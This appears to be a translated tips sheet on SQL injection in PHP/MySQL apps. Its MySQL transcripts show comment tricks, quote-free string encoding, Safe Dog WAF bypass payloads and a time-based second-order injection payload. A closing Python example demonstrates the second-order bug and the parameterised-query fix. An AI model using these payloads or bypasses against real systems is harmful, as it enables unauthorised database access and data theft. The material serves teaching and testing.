Easily overlooked and easily mistaken points (php)

Tips for SQL injection
=========================================================================

* If single quotes are escaped and the current database uses GBK encoding, a double-byte (wide-byte) injection can be considered.

* Correct use of comment markers

  "-- " (with a trailing space) is the MySQL comment marker; note the space after it.

    mysql> select user() from (select 1)x where '1'='1';-- '
    +----------------+
    | user()         |
    +----------------+
    | root@localhost |
    +----------------+
    1 row in set (0.00 sec)

  With the "#" comment marker it does not matter whether a space follows.

    mysql> select user() from (select 1) x where '1'='1';#'
    +----------------+
    | user()         |
    +----------------+
    | root@localhost |
    +----------------+
    1 row in set (0.00 sec)

* Use /**/ in place of spaces

    mysql> select/**/1;
    +---+
    | 1 |
    +---+
    | 1 |
    +---+
    1 row in set (0.00 sec)

* String escaping in SQL statements (writing a string without quote characters)

  - char() with a list of byte values

    mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );
    +-------------------------------------------------------------------+
    | char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |
    +-------------------------------------------------------------------+
    |  /tmp/f_user.txt                                                  |
    +-------------------------------------------------------------------+
    1 row in set (0.00 sec)

  - concat() of single char() values

    mysql> select concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |  /tmp/f_user.txt                                                                                                                                                    |
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    1 row in set (0.00 sec)

  - unhex() of the UTF-8 bytes

    mysql> select unhex('E6B8B8E5AEA2');
    +-----------------------+
    | unhex('E6B8B8E5AEA2') |
    +-----------------------+
    | 遊客                  |
    +-----------------------+
    1 row in set (0.00 sec)

* Comparing numbers with strings behaves like PHP's weak typing

    mysql> select '10asfasfdeasdfasdf'=10;
    +-------------------------+
    | '10asfasfdeasdfasdf'=10 |
    +-------------------------+
    |                       1 |
    +-------------------------+

    mysql> select '0esfsadf'=0;
    +--------------+
    | '0esfsadf'=0 |
    +--------------+
    |            1 |
    +--------------+

* Bypassing Safe Dog (安全狗, a WAF)

  ** Regex bypass

    mysql> select 1/*!50000union/*!*//*!50000select/*!*/2;
    +---+
    | 1 |
    +---+
    | 1 |
    | 2 |
    +---+

    mysql> select/*/#\*/1;
    +---+
    | 1 |
    +---+
    | 1 |
    +---+
    1 row in set (0.00 sec)

* When several single quotes are adjacent, the outermost two lone quotes pair up to close the literal; the consecutive quotes in between come in an even number, and each pair is converted into one literal quote.

    mysql> select '123''';
    +------+
    | 123' |
    +------+
    | 123' |
    +------+
    1 row in set (0.00 sec)

    mysql> select '123''''';
    +-------+
    | 123'' |
    +-------+
    | 123'' |
    +-------+

    mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'
    Empty set (1.00 sec)

  This behaviour can give rise to "second-order injection". For example, when a user registers, the nickname {nickname'} they enter is escaped to {nickname\'}, but once inserted into the database it is restored to its original form. Any page that then uses the nickname as a query condition has a second-order injection, and setting the value of the other condition field to { or 0=sleep(1);#} is enough to trigger it.
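The second-order case just described, as an added example that is not from the original post: a constructed registration-then-lookup flow in Python, with an in-memory SQLite database standing in for MySQL (both treat `''` inside a literal as one quote). It shows why escaping on input does not protect a later query that trusts the value read back from the database, and that a parameterised query handles the same nickname correctly. The table, column names and the `secret` password are assumptions made for the demo.

```python
import sqlite3

# Added example, not code from the original post. SQLite stands in for MySQL;
# the stored nickname is what MySQL holds after the escaped registration
# INSERT ... VALUES ('nickname\'') is unescaped on the way into the table.

NICK_WITH_QUOTE = "nickname'"   # constructed registration input


def build_db() -> sqlite3.Connection:
    """Create the constructed users table with the quote-bearing nickname stored raw."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    # The input was escaped at registration, but the database unescapes it on
    # insert, so the stored row holds the original quote again.
    conn.execute("INSERT INTO users VALUES (?, ?)", (NICK_WITH_QUOTE, "secret"))
    conn.commit()
    return conn


def lookup_unsafe(conn: sqlite3.Connection, nickname: str, password: str) -> list:
    """Second-order pattern: the nickname came from the database, so it is
    concatenated into the query unescaped. A nickname ending in a quote makes
    'nickname'' AND password=' one string literal, so the password field now
    decides how the rest of the statement is parsed."""
    sql = f"SELECT user FROM users WHERE user='{nickname}' AND password='{password}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, nickname: str, password: str) -> list:
    """Parameterised query: values travel separately from the SQL text, so a
    quote inside the nickname is data, never syntax."""
    sql = "SELECT user FROM users WHERE user=? AND password=?"
    return conn.execute(sql, (nickname, password)).fetchall()


def demo() -> tuple:
    """Return (rows from the safe lookup, error text from the unsafe lookup).
    With an ordinary password the concatenated query is malformed; that syntax
    error in the application log is the first visible symptom of the bug."""
    conn = build_db()
    safe_rows = lookup_safe(conn, NICK_WITH_QUOTE, "secret")
    try:
        lookup_unsafe(conn, NICK_WITH_QUOTE, "secret")
        unsafe_error = ""
    except sqlite3.OperationalError as exc:
        unsafe_error = str(exc)
    return safe_rows, unsafe_error


if __name__ == "__main__":
    rows, err = demo()
    print("parameterised lookup returned:", rows)
    print("concatenated lookup failed with:", err)
```

A login or profile page that starts logging SQL syntax errors for nicknames containing quotes is showing exactly this unbalanced-quote symptom; the fix is to parameterise the second query rather than to escape harder at registration.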